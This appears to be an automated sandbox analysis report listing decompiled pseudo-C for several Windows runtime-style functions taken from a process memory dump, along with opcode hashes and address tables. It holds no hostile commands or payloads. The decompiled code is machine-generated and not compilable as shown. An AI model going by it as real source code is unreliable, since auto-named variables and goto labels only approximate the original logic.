                                                      0x04986c4d
                                                      0x04986c60
                                                      0x04986c65
                                                      0x04986c69
                                                      0x04986c73
                                                      0x04986c79
                                                      0x04986c7f
                                                      0x04986c86
                                                      0x04986c90
                                                      0x04986c94
                                                      0x04986ca6
                                                      0x04986cb2
                                                      0x04986cbd
                                                      0x04986cbd
                                                      0x04986cc3
                                                      0x04986cc7
                                                      0x04986ccb
                                                      0x04986cd0
                                                      0x04986cd1
                                                      0x04986ce2
                                                      0x04986ce2
                                                      0x04986c69
                                                      0x04986ced

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 72bec3e74c78fcefeefc40b43811b4ac00dd78c194699232fdd0126359720d2e
                                                      • Instruction ID: da63dd40c34099e6fdb24edd4b2c717ef4ee4a37d815f10e667d4391a0405cbd
                                                      • Opcode Fuzzy Hash: 72bec3e74c78fcefeefc40b43811b4ac00dd78c194699232fdd0126359720d2e
                                                      • Instruction Fuzzy Hash: AC218BB1A00654AFD715DBA8D980F6AB7B8FF88744F1400AAF904DBB91D634ED10CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049490AF, Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E049490AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0495D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0493E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04924620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0494F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0493A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                      0x049490af
                                                      0x049490b8
                                                      0x049490bb
                                                      0x049490bf
                                                      0x049490c2
                                                      0x049490c2
                                                      0x049490c8
                                                      0x049490cb
                                                      0x049490cd
                                                      0x049814d7
                                                      0x049814eb
                                                      0x049814eb
                                                      0x00000000
                                                      0x049814eb
                                                      0x049814db
                                                      0x049814e6
                                                      0x00000000
                                                      0x049814f2
                                                      0x049814e8
                                                      0x00000000
                                                      0x049814e8
                                                      0x049490d8
                                                      0x049490da
                                                      0x049490dd
                                                      0x049490e5
                                                      0x00000000
                                                      0x04949139
                                                      0x049490fa
                                                      0x049490fe
                                                      0x04949142
                                                      0x00000000
                                                      0x04949142
                                                      0x04949104
                                                      0x04949107
                                                      0x0494910b
                                                      0x04949110
                                                      0x04949118
                                                      0x04949147
                                                      0x04949148
                                                      0x0494914f
                                                      0x04949150
                                                      0x04949151
                                                      0x04949152
                                                      0x04949156
                                                      0x0494915d
                                                      0x04949160
                                                      0x04949168
                                                      0x0494916c
                                                      0x049491bc
                                                      0x049491be
                                                      0x00000000
                                                      0x049491be
                                                      0x0494916e
                                                      0x04949173
                                                      0x04949176
                                                      0x00000000
                                                      0x00000000
                                                      0x0494917c
                                                      0x04949180
                                                      0x049491b5
                                                      0x00000000
                                                      0x049491b5
                                                      0x04949182
                                                      0x04949185
                                                      0x04949189
                                                      0x00000000
                                                      0x00000000
                                                      0x0494918e
                                                      0x04949190
                                                      0x04949198
                                                      0x00000000
                                                      0x00000000
                                                      0x049491a0
                                                      0x00000000
                                                      0x049491ad
                                                      0x049491ad
                                                      0x049491b0
                                                      0x049491b1
                                                      0x00000000
                                                      0x04949185
                                                      0x0494911a
                                                      0x0494911c
                                                      0x0494911f
                                                      0x04949125
                                                      0x04949127
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction ID: 25265df950ec76540d30ad38b657fb2188b920115191acf5be1cc0251c9f4ec2
                                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction Fuzzy Hash: CB2141B1A00205EFEB20DF69C544E6AB7F8EB88354F14887AE94597250D230F9449B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04933B7A, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E04933B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x49f84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x49f84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x49f84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0494AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0494FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x49f84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x49f84c4; // 0x0
					L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                      0x04933b89
                                                      0x04933b96
                                                      0x04933ba1
                                                      0x04933bab
                                                      0x04933bb5
                                                      0x04933bb9
                                                      0x04976298
                                                      0x04933bbf
                                                      0x04933bc2
                                                      0x04933bc3
                                                      0x04933bc9
                                                      0x04933bca
                                                      0x04933bcc
                                                      0x04933bcd
                                                      0x04933bd4
                                                      0x04933bd6
                                                      0x04933bdb
                                                      0x04933bea
                                                      0x04933bf7
                                                      0x04933bfb
                                                      0x04933bff
                                                      0x04933c09
                                                      0x04933c0a
                                                      0x04933c0b
                                                      0x04933c0f
                                                      0x04933c14
                                                      0x04933c18
                                                      0x04933c18
                                                      0x04933bfb
                                                      0x04933c1b
                                                      0x04933c30
                                                      0x04933c30
                                                      0x04933c3d

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d12ad7c3893f5f26e8e54214b3f3ef11e14c336de0c29de12e46acce263e93a0
                                                      • Instruction ID: 44566d3746b67f1a1b6a79317ec160862f45eeae7689c5c1ff9e42e9e1da6cea
                                                      • Opcode Fuzzy Hash: d12ad7c3893f5f26e8e54214b3f3ef11e14c336de0c29de12e46acce263e93a0
                                                      • Instruction Fuzzy Hash: 61218E72A00119AFDB10DF98CD81F6ABBBDFB85708F1504B8E908AB251D775BD11CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04986CF0, Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E04986CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04927D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04927D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x48e5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0493F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0493F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04987016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04922400( &_v52);
								}
								_t21 = L04922400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                      0x04986cfb
                                                      0x04986d00
                                                      0x04986d02
                                                      0x04986d06
                                                      0x04986d0a
                                                      0x04986d0e
                                                      0x04986d19
                                                      0x04986d2b
                                                      0x04986d1b
                                                      0x04986d24
                                                      0x04986d24
                                                      0x04986d33
                                                      0x04986d39
                                                      0x04986d46
                                                      0x04986d4f
                                                      0x04986d61
                                                      0x04986d51
                                                      0x04986d5a
                                                      0x04986d5a
                                                      0x04986d69
                                                      0x04986d6b
                                                      0x04986d6d
                                                      0x04986d6f
                                                      0x04986d6f
                                                      0x04986d74
                                                      0x04986d79
                                                      0x04986d7a
                                                      0x04986d7f
                                                      0x04986d82
                                                      0x04986d88
                                                      0x04986d89
                                                      0x04986d90
                                                      0x04986d94
                                                      0x04986da7
                                                      0x04986db1
                                                      0x04986db1
                                                      0x04986dbb
                                                      0x04986dbb
                                                      0x04986d90
                                                      0x04986d69
                                                      0x04986d46
                                                      0x04986dc6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 954afcb04e09067af2cb52710bb1d6267af2d2686e188b38584f3d1ceee9d27e
                                                      • Instruction ID: 91304f37593b772c0a17caa3808244a99ea9106e22e226a49d2aa6a39bf14807
                                                      • Opcode Fuzzy Hash: 954afcb04e09067af2cb52710bb1d6267af2d2686e188b38584f3d1ceee9d27e
                                                      • Instruction Fuzzy Hash: EE21B0725046449BD711EF6DCE44B6BB7ECAFC1744F04097AB940CB261E734FA08C6A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049D070D, Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 67%
                                                      			E049D070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E049D07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E049CAFDE( &_v8,  &_v12);
					E049D1293(_t38, _v28, _t60);
					if(E04927D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E049C14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                      0x049d071b
                                                      0x049d0724
                                                      0x049d0734
                                                      0x049d0738
                                                      0x049d074b
                                                      0x049d074b
                                                      0x049d0753
                                                      0x049d0753
                                                      0x049d0759
                                                      0x049d075d
                                                      0x049d0774
                                                      0x049d0779
                                                      0x049d077d
                                                      0x049d0789
                                                      0x049d0795
                                                      0x049d07a7
                                                      0x049d0797
                                                      0x049d07a0
                                                      0x049d07a0
                                                      0x049d07af
                                                      0x049d07c4
                                                      0x049d07cd
                                                      0x049d07cd
                                                      0x049d07af
                                                      0x049d07dc

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction ID: cc40690120c41ba9094aebf9c303ca2c2308eec6630a531fa37daa1c5b7edf96
                                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction Fuzzy Hash: 1521F2362042049FD705DF18CC80B6ABBA9EBC4354F04C579F9959F385D630E909CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0492AE73, Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0492AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04927D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04927D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04927D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04927D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04987794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                      0x0492ae78
                                                      0x0492ae7c
                                                      0x0492ae7e
                                                      0x0492ae81
                                                      0x0492ae86
                                                      0x0492ae8d
                                                      0x04972691
                                                      0x0492ae93
                                                      0x0492ae93
                                                      0x0492ae93
                                                      0x0492ae98
                                                      0x0492ae9d
                                                      0x049726a2
                                                      0x049726b4
                                                      0x049726a4
                                                      0x049726ad
                                                      0x049726ad
                                                      0x049726b9
                                                      0x00000000
                                                      0x049726bb
                                                      0x00000000
                                                      0x049726bb
                                                      0x0492aea3
                                                      0x0492aea3
                                                      0x0492aea3
                                                      0x0492aeaa
                                                      0x049726c0
                                                      0x049726c9
                                                      0x049726c9
                                                      0x0492aeb3
                                                      0x049726d4
                                                      0x049726e1
                                                      0x00000000
                                                      0x00000000
                                                      0x049726e7
                                                      0x049726ee
                                                      0x049726f0
                                                      0x049726f9
                                                      0x049726f9
                                                      0x04972702
                                                      0x04972708
                                                      0x04972708
                                                      0x0497270b
                                                      0x0497270f
                                                      0x04972711
                                                      0x04972711
                                                      0x04972725
                                                      0x04972725
                                                      0x00000000
                                                      0x0492aeb9
                                                      0x0492aeb9
                                                      0x0492aebf
                                                      0x0492aebf
                                                      0x0492aeb3

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction ID: 02293fbd7744a0b549feaa3cc5b85b3f99379a5c9d983e7a5afb57c58775f048
                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction Fuzzy Hash: CF2104326116908FEB219B68CA88B2537E9FF80344F1904F2DC048B296E734FC41C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04987794, Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E04987794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x49f7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0494F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04927D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04949AE0();
					_t24 = L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                      0x04987799
                                                      0x0498779a
                                                      0x0498779b
                                                      0x049877a3
                                                      0x049877ab
                                                      0x049877ae
                                                      0x049877b1
                                                      0x049877b1
                                                      0x049877bf
                                                      0x049877c4
                                                      0x049877c8
                                                      0x049877ce
                                                      0x049877d4
                                                      0x049877e0
                                                      0x049877e0
                                                      0x049877d6
                                                      0x049877d6
                                                      0x049877de
                                                      0x00000000
                                                      0x00000000
                                                      0x049877de
                                                      0x049877e5
                                                      0x049877f0
                                                      0x049877f3
                                                      0x049877f6
                                                      0x049877fd
                                                      0x04987800
                                                      0x0498780c
                                                      0x04987818
                                                      0x0498782b
                                                      0x0498781a
                                                      0x04987823
                                                      0x04987823
                                                      0x04987830
                                                      0x04987831
                                                      0x04987838
                                                      0x0498783d
                                                      0x0498783e
                                                      0x0498784f
                                                      0x0498784f
                                                      0x0498785a

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08f2007b74ad83c59da859665fea5fadb0ccde6708298da392d06965d323839b
                                                      • Instruction ID: d4a1eb844df0a962d7f70423e2b14d92c591d7a562d8af54458398b0b3ee025a
                                                      • Opcode Fuzzy Hash: 08f2007b74ad83c59da859665fea5fadb0ccde6708298da392d06965d323839b
                                                      • Instruction Fuzzy Hash: AE216D72900644AFC725EFA9DC90E6BBBBDEF88740F1045BDE50AD7650E634E900CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0493FD9B, Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E0493FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E049176E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                      0x0493fd9b
                                                      0x0493fda0
                                                      0x0493fda1
                                                      0x0493fdab
                                                      0x0493fdad
                                                      0x0493fdb0
                                                      0x0493fdb8
                                                      0x0493fe0f
                                                      0x0493fde6
                                                      0x0493fde9
                                                      0x0493fdec
                                                      0x0497c0c0
                                                      0x0493fdfe
                                                      0x0493fe06
                                                      0x0493fe06
                                                      0x0497c0c8
                                                      0x0493fe2d
                                                      0x0493fe2d
                                                      0x00000000
                                                      0x0493fe2d
                                                      0x0497c0d1
                                                      0x0497c0e0
                                                      0x0497c0e5
                                                      0x0497c0e5
                                                      0x0497c0e8
                                                      0x00000000
                                                      0x0497c0e8
                                                      0x0493fdf4
                                                      0x00000000
                                                      0x00000000
                                                      0x0493fdf6
                                                      0x0493fdfa
                                                      0x0493fe1a
                                                      0x0493fe1f
                                                      0x0493fe1f
                                                      0x0493fdfc
                                                      0x00000000
                                                      0x0493fdfc
                                                      0x0493fdcc
                                                      0x0493fdd0
                                                      0x0493fe26
                                                      0x00000000
                                                      0x0493fe26
                                                      0x0493fdd8
                                                      0x0493fddb
                                                      0x0493fddd
                                                      0x0493fde0
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: 54540aa43f863a8165eae3fa6403471f2ad4c47e6b1f38654c715cdae8113f78
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: 6E219F72A00640DFDB31CF49C644E66F7E9EB95B11F2585BEE94587618E734BC00DB80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04909240, Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E04909240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x49df708);
				E0495D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E049495D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E049495D0();
				_t33 =  *0x49f84c4; // 0x0
				L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x49f84c4; // 0x0
				L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x49f84c4; // 0x0
				E04922280(L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x49f86b4);
